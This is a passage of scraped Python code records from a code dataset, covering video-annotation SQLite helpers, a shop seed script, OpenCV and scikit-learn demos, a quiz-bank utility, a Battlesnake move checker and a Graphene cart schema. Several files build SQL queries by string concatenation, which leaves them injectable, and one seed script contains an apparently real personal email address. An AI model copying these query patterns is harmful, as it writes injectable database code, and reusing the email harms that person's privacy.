A.source and serialId = A.serialId)\"\n\t\tlabelNameStr = [\"(select labelName from '\"+self.VideoName+\"' where id = A.serialId)\", \"(select labelName from '\"+self.VideoName+\"_tracker' where tracker = A.serialId)\"]\n\t\ttitleStr = [labelNameStr[0] + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as title\", labelNameStr[1] + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as title\"]\n\t\tsqlExecuteString = str(\t\"SELECT id, regionId, frame as s_frame, frame as e_frame, \"+titleStr[0]+\", source, serialId from '\"+self.VideoName+\"_event_a' A where regionId = \"+ str(regionId) +\" and source = 0\" \\\n\t\t\t\t\t\t\t\t\" union \" \\\n\t\t\t\t\t\t\t\t\"SELECT id, regionId, min(frame) as s_frame, max(frame) as e_frame, \"+titleStr[1]+\", source, serialId from '\"+self.VideoName+\"_event_a' A where regionId = \"+ str(regionId) +\" and source = 1 group by serialId order by source desc, frame asc\")\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregionId = str(row[1])\n\t\t\ts_frame = int(row[2])\n\t\t\te_frame = int(row[3])\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5])\n\t\t\tserialId = int(row[6])\n\t\t\tself.events.append((id, regionId, s_frame, e_frame, title, source, serialId))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef getRelEventById(self, serial):\n\t\tself.events = []\n\t\tshape_type, serialId = serial\n\t\tkeys = {'shape':0, 'tracker':1, 'region':2}\n\t\tselectSequenceSql = str(\"(select sequence from '\"+self.VideoName+\"_seq' B where B.source = \"+str(keys[shape_type])+\" and B.serialId = \"+ str(serialId) +\" union select 'None' as sequence)\")\n\t\tsqlExecuteString = str(\t\"SELECT A.id, A.eventId, A.s_frame, A.e_frame, A.title, A.source, A.serialId, \"+selectSequenceSql+\" from '\"+self.VideoName+\"_event_r' A where A.eventId in (select eventId from '\"+self.VideoName+\"_event_r' where source = \"+str(keys[shape_type])+\" and serialId = \"+ str(serialId) +\")\")\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = int(row[0]) if row[0] is not None else None\n\t\t\teventId = int(row[1]) if row[1] is not None else None\n\t\t\ts_frame = int(row[2]) if row[2] is not None else None\n\t\t\te_frame = int(row[3]) if row[3] is not None else None\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5]) if row[5] is not None else None\n\t\t\tserialId = int(row[6]) if row[6] is not None else None\n\t\t\tsequence = None if str(row[7]) == str('None') else str(row[7])\n\t\t\tif source is not None:\n\t\t\t\tself.events.append((id, eventId, s_frame, e_frame, title, source, serialId, sequence))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef deleteAutoEventRelShape(self, regionId, frame=None):\n\t\tif self.sqlConn is not None:\n\t\t\tframeStr = '' if frame is None else ' and frame = '+str(frame)\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where regionId = \"+ str(regionId)+ \" and source = 0\" + frameStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteAutoEventRelTracker(self, tracker=None, frameStart=0, frameEnd=None):\n\t\tif self.sqlConn is not None:\n\t\t\ttrackerStr = '' if tracker is None else ' and serialId = ' + str(tracker)\n\t\t\tframeStr = ' and '+ str(frameStart) +' >= frame ' if frameEnd is None else ' and '+ str(frameStart) +' >= frame and frame >= ' + str(frameEnd)\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where source = 1 \" + trackerStr + frameStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventByRegion(self, regionId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where regionId = \"+ str(regionId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_r' where source = 2 and serialId = \"+ str(regionId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventByShape(self, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where source = 0 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_u' where source = 0 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_r' where source = 0 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventByTracker(self, serialId):\n\t\tif serialId is None:\n\t\t\treturn True\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where source = 1 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_u' where source = 1 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_r' where source = 1 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventById(self, eventType, id):\n\t\ttables = {'relation': '_event_r', 'user_event': '_event_u'}\n\t\twheres = {'relation': 'eventId', 'user_event': 'id'}\n\t\tif self.sqlConn is not None and eventType in tables:\n\t\t\tsqlExecuteString = str(\"delete from '\"+self.VideoName+tables[eventType]+\"' where \"+ wheres[eventType] +\" is \"+str(id))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeAutoEventDataByShape(self, regionId, frame, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tifNotExistStr = \" where not exists (select 1 from '\"+self.VideoName+\"_event_a' where regionId = \"+str(regionId)+\" and frame = \"+str(frame)+\" and source = 0 and serialId = \"+str(serialId)+\")\"\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_a' (frame, regionId, source, serialId) select \"+str(frame)+\", \"+str(regionId)+\", 0, \"+str(serialId) + ifNotExistStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeAutoEventDataByTracker(self, regionId, frame, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tifNotExistStr = \" where not exists (select 1 from '\"+self.VideoName+\"_event_a' where regionId = \"+str(regionId)+\" and frame = \"+str(frame)+\" and source = 1 and serialId = \"+str(serialId)+\")\"\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_a' (frame, regionId, source, serialId) select \"+str(frame)+\", \"+str(regionId)+\", 1, \"+str(serialId) + ifNotExistStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeShapeEventData(self, frame, title, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_u' (s_frame, e_frame, title, source, serialId) VALUES (\"+str(frame)+\", \"+str(frame)+\", '\"+str(title)+\"', 0, \"+str(serialId)+\")\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeTrackerEventData(self, frame, title, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_u' (s_frame, e_frame, title, source, serialId) VALUES (\"+str(frame)+\", \"+str(frame)+\", '\"+str(title)+\"', 1, \"+str(serialId)+\")\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeRelEventData(self, frame, title, serialIds):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"select max(seq) from SQLITE_SEQUENCE where name='\"+self.VideoName+\"_event_r'\")\n\t\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\t\trow = cursor.fetchone()\n\t\t\teventId = int(row[0]) if row[0] is not None else 0\n\t\t\tfor serial in serialIds:\n\t\t\t\tshape_type, serialId = serial\n\t\t\t\tkeys = {'shape':0, 'tracker':1, 'region':2}\n\t\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_r' (eventId, s_frame, e_frame, title, source, serialId) VALUES (\"+str(eventId)+\",\"+str(frame)+\",\"+str(frame)+\", '\"+str(title)+\"', \"+str(keys[shape_type])+\", \"+str(serialId)+\")\")\n\t\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef getEventDetailBySource(self, source, serialId):\n\t\ttables = {'0':'', '1':'_tracker', '2':'_region'}\n\t\tcolumns = {'0':'labelName', '1':'labelName', '2':'regionName'}\n\t\twheres = {'0': 'id', '1': 'tracker', '2': 'id'}\n\t\tselectSequenceSql = str(\"(select sequence from '\"+self.VideoName+\"_seq' B where B.source = \"+str(source)+\" and B.serialId = \"+ str(serialId) +\" union select 'None' as sequence)\")\n\t\tsqlExecuteString = str(\t\"SELECT A.\"+ columns[str(source)] +\" as label, \"+selectSequenceSql+\" from '\"+ self.VideoName+tables[str(source)] +\"' A where \"+ wheres[str(source)] +\" = \"+ str(serialId))\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\treturn (row[0], None if str(row[1]) == str('None') else str(row[1]))\n\t\treturn None\n","sub_path":"EventHelper.py","file_name":"EventHelper.py","file_ext":"py","file_size_in_byte":21653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633023294","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport datetime\nfrom Database_Set import *\n\nengine = create_engine('sqlite:///shopping.db')\n# Bind the engine to the metadata of the Base class so that the\n# declaratives can be accessed through a DBSession instance\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\n# A DBSession() instance establishes all conversations with the database\n# and represents a \"staging zone\" for all the objects loaded into the\n# database session object. Any change made against the objects in the\n# session won't be persisted into the database until you call\n# session.commit(). If you're not happy about the changes, you can\n# revert all of them back to the last commit by calling\n# session.rollback()\nsession = DBSession()\n\n# Delete Shopping if exisitng.\nsession.query(Shopping).delete()\n# Delete BrandName if exisitng.\nsession.query(BrandName).delete()\n# Delete User if exisitng.\nsession.query(User).delete()\n\n# Create sample users data\nUser1 = User(name=\"yelchuri Aakanksha\",\n email=\"aakanksha.yelchuri@gmail.com\",\n picture='http://www.enchanting-costarica.com/wp-content/'\n 'uploads/2018/02/jcarvaja17-min.jpg')\nsession.add(User1)\nsession.commit()\nprint (\"Successfully Add First User\")\n# Create sample brand companys\nCompany1 = Shopping(name=\"Women's Fashion\",\n user_id=1)\nsession.add(Company1)\nsession.commit()\n\nCompany2 = Shopping(name=\"Men's Fashion\",\n user_id=1)\nsession.add(Company2)\nsession.commit\n\nCompany3 = Shopping(name=\"Accessories\", user_id=1)\nsession.add(Company3)\nsession.commit()\n\nCompany4 = Shopping(name=\"Car,Motorbikes\", user_id=1)\nsession.add(Company4)\nsession.commit()\n\nCompany5 = Shopping(name=\"Toys and Baby World\", user_id=1)\nsession.add(Company5)\nsession.commit()\n\nCompany6 = Shopping(name=\"Electronic Gatgets\", user_id=1)\nsession.add(Company6)\nsession.commit()\n\n# Populare a shops with models for testing\n# Using different users for shops names year also\nName1 = BrandName(name=\"Women's Dress\",\n year=\"2019\",\n color=\"black\",\n brand=\"AQUA\",\n price=\"750\",\n shoppingid=1,\n user_id=1)\nsession.add(Name1)\nsession.commit()\n\nName2 = BrandName(name=\"Men's Dress\",\n year=\"2019\",\n color=\"blue\",\n brand=\"Denim\",\n price=\"1500\",\n shoppingid=2,\n user_id=1)\nsession.add(Name2)\nsession.commit()\n\nName3 = BrandName(name=\"Hand Bags\",\n year=\"2018\",\n color=\"All colors\",\n brand=\"Guess\",\n price=\"5,000\",\n shoppingid=3,\n user_id=1)\nsession.add(Name3)\nsession.commit()\n\nName4 = BrandName(name=\"Scooty\",\n year=\"2017\",\n color=\"purple\",\n brand=\"Activa 5G\",\n price=\"55,950\",\n shoppingid=4,\n user_id=1)\nsession.add(Name4)\nsession.commit()\n\nName5 = BrandName(name=\"Toys\",\n year=\"2014\",\n color=\"orange\",\n brand=\"Disney\",\n price=\"600\",\n shoppingid=5,\n user_id=1)\nsession.add(Name5)\nsession.commit()\n\nName6 = BrandName(name=\"Mobiles\",\n year=\"2019\",\n color=\"Black\",\n brand=\"Samsung\",\n price=\"13,000\",\n shoppingid=6,\n user_id=1)\nsession.add(Name6)\nsession.commit()\n\nprint(\"Your Shopping database has been inserted successfully!\")\n\n","sub_path":"catalog/Data_start.py","file_name":"Data_start.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"478954822","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 11:28:43 2019\n\n@author: tarun.bhavnani@dev.smecorner.com\n\"\"\"\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\n\n\nvectorizer1 = CountVectorizer()\nvectorizer2 = TfidfVectorizer()\n\n\ntext=[\"tarun bhavnani\",\"works in smecorner\",\"is a data dcientist and an NLP scientost\",\"tarun is building a chatbot\"]\n\ntt1=vectorizer1.fit_transform(text)\nvectorizer1.vocabulary_\ntt2=vectorizer2.fit_transform(text)\nvectorizer2.vocabulary_\n\n\nprint(tt2)\ntt1.toarray()\ntt2.toarray()\n\n\nvectorizer3 = CountVectorizer(ngram_range=(1, 2))\nvectorizer4 = TfidfVectorizer(ngram_range=(1, 2))\n\ntt3=vectorizer3.fit_transform(text)\nvectorizer3.vocabulary_\ntt4=vectorizer4.fit_transform(text)\nvectorizer4.vocabulary_\n","sub_path":"Bow_creation.py","file_name":"Bow_creation.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"306743554","text":"import cv2\n\no = cv2.imread('img12.jpg')\nimg = o\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nret, binary = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\ncontours, hierarchy = cv2.findContours(binary, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\nhull = cv2.convexHull(contours[0])\nimage = cv2.cvtColor(binary, cv2.COLOR_GRAY2BGR)\ncv2.polylines(image, [hull], True, (0,255,0), 2)\n\ndistA = cv2.pointPolygonTest(hull, (320, 115), True)\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(image, 'A', (320, 115), font, 1, (0,255,0), 3)\nprint('distA = ', distA)\n\ndistB = cv2.pointPolygonTest(hull, (300, 200), True)\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(image, 'B', (300, 200), font, 1, (0,255,0), 3)\nprint('distB = ', distB)\n\ndistC = cv2.pointPolygonTest(hull, (440, 76), True)\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(image, 'C', (440, 76), font, 1, (0,255,0), 3)\nprint('distC = ', distC)\n\n#print(hull)\n\ncv2.imshow('result', image)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"ex12-24.py","file_name":"ex12-24.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542663656","text":"import math\nfrom functools import partial\n\nimport numpy as np\n\nfrom dpipe.dl.model_controller import ModelController\nfrom dpipe.utils.batch_iter_factory import BatchIterFactory\nfrom dpipe.medim.metrics import multichannel_dice_score\nfrom .utils import make_find_next_lr, make_check_loss_decrease\n\n\ndef train_segm(\n model_controller: ModelController,\n train_batch_iter_factory: BatchIterFactory,\n val_ids, dataset, *, n_epochs, lr_init, lr_dec_mul=0.5,\n patience: int, rtol=0, atol=0):\n val_x = [dataset.load_mscan(p) for p in val_ids]\n val_segm = [dataset.load_segm(p) for p in val_ids]\n val_msegm = [dataset.load_msegm(p) for p in val_ids]\n\n find_next_lr = make_find_next_lr(\n lr_init, lambda lr: lr * lr_dec_mul,\n partial(make_check_loss_decrease, patience=patience,\n rtol=rtol, atol=atol))\n\n lr = find_next_lr(math.inf)\n with train_batch_iter_factory:\n for i in range(n_epochs):\n with next(train_batch_iter_factory) as train_batch_iter:\n train_loss = model_controller.train(train_batch_iter, lr=lr)\n lr = find_next_lr(train_loss)\n\n y_pred_proba, val_loss = model_controller.validate(val_x, val_segm)\n\n y_pred = [np.argmax(y, axis=0) for y in y_pred_proba]\n msegm_pred = [dataset.segm2msegm(y) for y in y_pred]\n\n dices = [multichannel_dice_score(pred, true)\n for pred, true in zip(msegm_pred, val_msegm)]\n\n print('{:>5} {:>10.5f} {}'.format(i, val_loss,\n np.mean(dices, axis=0)))\n","sub_path":"dpipe/train/train_segm.py","file_name":"train_segm.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288878711","text":"\nimport json\n\ndef get_number_of_documents(documents):\n return len(documents)\n\ndef get_unique_devices(documents):\n devices = []\n for d in documents:\n devices.append(d['device'])\n return list(set(devices))\n\ndef get_device_info(documents):\n devices = []\n for d in documents:\n info = {\n \"device\" : d['device'],\n \"location\" : d['location'],\n \"sensors\" : sorted(d['data'].keys()) # get sensor keys and sort them alphabetically\n }\n devices.append(json.dumps(info))\n unique_devices = list(set(devices))\n info = []\n for u_d in unique_devices:\n info.append(json.loads(u_d))\n return info\n","sub_path":"azure_APP/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"116510409","text":"import jieba\nimport jieba.analyse\n\nfrom db_handler import engine\n\n\ndef init_database():\n bank_exist = engine.check_table_exist(\"t_bank\")\n init_result = [False, False]\n\n config_exist = engine.check_table_exist(\"t_config\")\n if not config_exist:\n config_sql = \"\"\"create table t_config(\n pno INTEGER primary key autoincrement, \n left_top VARCHAR,\n right_bottom VARCHAR,\n auto_apply INTEGER, \n left_top_ans VARCHAR,\n right_bottom_ans VARCHAR, \n ans_1 VARCHAR,\n ans_2 VARCHAR,\n ans_3 VARCHAR,\n ans_4 VARCHAR\n )\"\"\"\n engine.execute(query=config_sql)\n init_result[0] = True\n\n if not bank_exist:\n sql = \"\"\"create table t_bank(\n pno INTEGER primary key autoincrement, \n ques VARCHAR not null,\n ans VARCHAR,\n wrong_ans VARCHAR \n )\"\"\"\n engine.execute(query=sql)\n init_result[1] = True\n return init_result\n\n\ndef init_data(ques, ans, wrong_ans=\"\"):\n sql = \"insert into t_bank(ques, ans, wrong_ans) values (\\\"{}\\\", \\\"{}\\\", \\\"{}\\\")\".format(ques, ans, wrong_ans)\n engine.execute(query=sql)\n\n\ndef init_config():\n sql = \"insert into t_config(auto_apply) values (\\\"{}\\\")\".format(1)\n engine.execute(query=sql)\n\n\ndef init_all_data(file_url, init_database_result):\n if init_database_result[0]:\n print(\"start initial config...\")\n init_config()\n\n if init_database_result[1]:\n count = 0\n print(\"start initial base data...\")\n with open(file_url,\"r\", encoding=\"gb18030\") as f:\n for line in f.readlines():\n if len(line.split(\"\\\",\\\"\")) == 3:\n line_list = line.split(\"\\\",\\\"\")[:2]\n ques = line_list[0].strip(\"\\\"\")\n ans = line_list[1]\n init_data(ques, ans)\n count += 1\n if count % 1000 == 0:\n print(\"have initial {} datas\".format(count))\n\n\ndef handle_words(res):\n # print(res)\n words = res.get(\"words_result\")\n words_ques = \"\".join([r.get(\"words\") for r in words[:-4]])\n words_ans = [r.get(\"words\") for r in words[-4:]]\n return words_ques, words_ans\n\n\ndef search_related_records(word_list):\n params = \"%\"\n if len(word_list) <= 1:\n return []\n for word in word_list:\n params += word[:3]\n params += \"%\"\n # print(params)\n sql = \"select * from t_bank where ques like '{}'\".format(params)\n res = engine.execute(query=sql).fetchall()\n # print(res)\n return res\n\n\ndef get_keywords(content):\n tags = jieba.analyse.extract_tags(content, topK=10) # error sorted\n\n tags = list(tags)\n tags.sort(key=lambda x: content.index(x))\n return list(tags)\n\n\ndef get_user_config():\n config_exist = engine.check_table_exist(\"t_config\")\n if config_exist:\n config_exist = config = engine.execute(query=\"select * from t_config limit 1\").fetchone()\n return config_exist\n\n\ndef after_right_answer(ques, ans):\n #\n ...\n\n\ndef after_wrong_answer():\n ...\n\n\nif __name__ == '__main__':\n # init_database()\n # print(engine.execute(query=\"select count(1) from t_bank\").fetchall())\n # sql = \"select * from t_bank where ques like \\\"%皮肤哪一部分受损%\\\"\"\n # print(engine.execute(query=sql).fetchall())\n ...\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"112720029","text":"from _battlesnake import Game, Block\n\n# whether or not to print output\noutput = False\n\ndef getVal(direction, data):\n g = Game(data)\n block = g.snake.head.getAdj(direction)\n\n # check if block is outside map\n if block.x < 0 or block.x > g.width-1 or block.y < 0 or block.y > g.height-1:\n if output:\n print(direction, ': outside of map!')\n return 0\n\n # check if block is one of our body parts\n if block in g.snake.parts[:-1]:\n if output:\n print(direction, ': is one of our parts (but not tail)!')\n return 0\n\n # get other snake tail positions\n tails = []\n for snake in g.others:\n tails.append(snake.tail)\n\n for snake in g.others:\n\n # check if block is other snake body part\n if block in snake.parts[:-1]:\n if output:\n print(direction, ': is other snake part (but not tail)!')\n return 0\n\n # check if block is where other snakes tail would be if it eats adjacent food\n if snake.head.isAdjTo(g.food) and block in tails:\n if output:\n print(direction, ': other snake could eat, not moving into their tail!')\n return 0\n\n return 1\n\nif __name__ == '__main__':\n data = { \"you\": \"25229082-f0d7-4315-8c52-6b0ff23fb1fb\", \"width\": 15, \"height\": 15, \"turn\": 0, \"snakes\": [{ \"taunt\": \"git gud\", \"name\": \"my-snake\", \"id\": \"25229082-f0d7-4315-8c52-6b0ff23fb1fb\", \"health_points\": 93, \"coords\": [ [ 5, 9 ], [ 4, 9 ], [ 4, 8 ],[ 4, 7 ],[ 4, 6 ],[ 4, 5 ],[ 4, 4 ],[ 4, 3 ] ] }, { \"taunt\": \"git gud\", \"name\": \"meow-snake\", \"id\": \"nan\", \"health_points\": 93, \"coords\": [ [ 6, 11 ], [ 6, 10 ],[ 6, 9 ],[ 6, 8 ],[ 6, 7 ],[ 6, 6 ],[ 6, 5 ],[ 6, 4 ],[ 6, 3 ],[ 6, 2 ],[ 5, 2 ] ] } ], \"game_id\": \"870d6d79-93bf-4941-8d9e-944bee131167\", \"food\": [ [7,8], [7,9],[7,10],[7,11],[7,12],[8,12],[9,12] ], \"dead_snakes\": []}\n if output:\n for i in ['up', 'left', 'down', 'right']:\n print(\"%s: %f\" % (i, getVal(i, data)))","sub_path":"app/factors/basic_collision.py","file_name":"basic_collision.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"613823132","text":"import graphene\nimport django\nfrom collections import defaultdict\nfrom graphene_django.types import DjangoObjectType\nfrom products.models import Category, Product, PercentSale, PackageDeal\n\n\nclass CategoryType(DjangoObjectType):\n class Meta:\n model = Category\n\n\nclass UserType(DjangoObjectType):\n class Meta:\n model = django.contrib.auth.models.User\n\n\nclass PercentSaleType(DjangoObjectType):\n class Meta:\n model = PercentSale\n\n\nclass PackageDealType(DjangoObjectType):\n class Meta:\n model = PackageDeal\n\n\nclass ProductType(DjangoObjectType):\n percentSale = PercentSaleType\n packageDeal = PackageDealType\n\n class Meta:\n model = Product\n\n\nclass CartItem(graphene.ObjectType):\n product = graphene.NonNull(ProductType)\n quantity = graphene.NonNull(graphene.Int)\n unitPrice = graphene.NonNull(graphene.Float)\n originalPrice = graphene.NonNull(graphene.Float)\n\n\nclass CartItemInput(graphene.InputObjectType):\n product = graphene.NonNull(graphene.ID)\n quantity = graphene.NonNull(graphene.Int)\n\n\nclass CartType(graphene.ObjectType):\n items = graphene.List(CartItem)\n totalBeforeDiscount = graphene.Float()\n totalDiscount = graphene.Float()\n total = graphene.Float()\n\n @staticmethod\n def find_sale_details(product_quantity, product_pricing,\n product_packagedeal):\n dbproducts = {}\n for product_id in product_quantity:\n # Find the product in the DB\n deal_product = Product.objects.filter(id=product_id)\n\n # Verify if product is valid\n if deal_product:\n deal_product = deal_product[0]\n else:\n continue\n\n # Add all to the result list\n if product_id in dbproducts:\n raise ValueError('Duplicate items')\n item = CartItem()\n item.product = deal_product\n item.quantity = product_quantity[product_id]\n dbproducts[product_id] = item\n\n # If the price has been calculated, skip the item\n if product_id in product_pricing:\n continue\n\n # Default price\n sale_price = deal_product.price\n\n deals = PercentSale.objects.filter(product=deal_product)\n max_deal = None\n for deal in deals:\n if max_deal is None:\n max_deal = deal\n else:\n if deal.cut > max_deal.cut:\n max_deal = deal\n\n if max_deal is not None:\n sale_price *= (100 - max_deal.cut) / 100.\n\n # The first package deal is picked\n package_deals = PackageDeal.objects.filter(product=deal_product)\n if package_deals:\n product_packagedeal[product_id] = package_deals[0]\n\n # Summarize details per product\n product_pricing[product_id] = (deal_product.price, sale_price)\n\n return list(dbproducts.values())\n\n @staticmethod\n def calculate_cart_price(cart, product_quantity,\n product_pricing, product_packagedeal):\n for product in product_quantity:\n original_price, sale_price = product_pricing[product]\n quantity = product_quantity[product]\n\n pay_quantity = quantity\n # A product may or may not have an associated package deal\n if product in product_packagedeal:\n deal = product_packagedeal[product]\n\n discounted = int(quantity / deal.minimumQuantity)\n discounted *= deal.paidQuantity\n discounted = int(discounted)\n\n remainder = quantity % deal.minimumQuantity\n\n pay_quantity = discounted + remainder\n product_pricing[product] = (\n original_price,\n (sale_price * pay_quantity) / quantity\n )\n\n cart.totalBeforeDiscount += original_price * quantity\n cart.total += sale_price * pay_quantity\n\n @staticmethod\n def processcart(products):\n # Create empty cart type\n cart = CartType(totalBeforeDiscount=0,\n totalDiscount=0,\n total=0)\n\n product_quantity = {\n item['product']: item['quantity']\n for item in products\n }\n product_pricing = {}\n product_packagedeal = {}\n\n # Finding package deals and percent sales\n cart.items = CartType.find_sale_details(\n product_quantity, product_pricing,\n product_packagedeal\n )\n\n # At this point we have all information on the products\n CartType.calculate_cart_price(\n cart, product_quantity, product_pricing,\n product_packagedeal\n )\n\n for item in cart.items:\n key = str(item.product.id)\n item.unitPrice = product_pricing[key][1]\n item.originalPrice = product_pricing[key][0]\n\n cart.totalDiscount = cart.totalBeforeDiscount - cart.total\n\n return cart\n\n\nclass LoginResultType(graphene.ObjectType):\n user = graphene.Field(UserType)\n success = graphene.Boolean()\n token = graphene.String()\n\n\nclass ReceiptType(graphene.ObjectType):\n cart = graphene.Field(CartType)\n success = graphene.Boolean()\n\n\nclass FilterInputType(graphene.InputObjectType):\n text = graphene.String(required=False)\n minPrice = graphene.Float(required=False)\n maxPrice = graphene.Float(required=False)\n category = graphene.List(graphene.ID, required=False)\n onSale = graphene.Boolean(required=False)\n organic = graphene.Boolean(required=False)\n","sub_path":"src/products/schema_types.py","file_name":"schema_types.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467746211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 17 17:23:52 2015\n\n@author: root\n\"\"\"\n\nimport sys\nimport logging\n\nimport settings\nimport feature_engineering\nfrom ml_model import ML_Model\nimport submission_writer\n\n# configure logging\nlogger = logging.getLogger(\"submission_pipeline\")\n\nhandler = logging.FileHandler(settings.LOG_PATH)\nhandler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s %(name)s: %(message)s'))\n\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\n# Feature engineer ( Transform features and create new ones )\nlogger.info('Start Feature Engineering')\nfe = feature_engineering.FeatureEngineer( False )\ntest_data = fe.engineer_features( settings.GLOBAL_TEST, 